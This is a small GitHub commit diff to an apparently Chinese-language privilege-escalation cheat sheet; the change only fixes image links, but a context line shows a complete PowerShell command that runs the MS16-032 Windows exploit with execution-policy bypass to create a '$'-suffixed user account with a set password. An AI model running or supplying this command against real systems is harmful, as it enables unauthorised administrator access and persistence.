Update Local Privilege Escalation.md

This commit is contained in:
东方有鱼名为咸 2019-10-04 16:15:09 +08:00 committed by GitHub
parent b96d4b334e
commit 9663450b85
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -223,10 +223,10 @@ exp 用途: powershell本地提权
powershell -nop -exec bypass -c "& {Import-Module 'c:\Invoke-MS16-032.ps1';Invoke-MS16-032 -Application cmd.exe -commandline '/c net user HELPS$ amin!@#45 /add'}"
```
***
![](../img/ms16%20032 _1.jpg)
![](../img/ms16%20032%20_1.jpg)
***
![](../img/ms16%20032 _2.jpg)
![](../img/ms16%20032%20_2.jpg)
***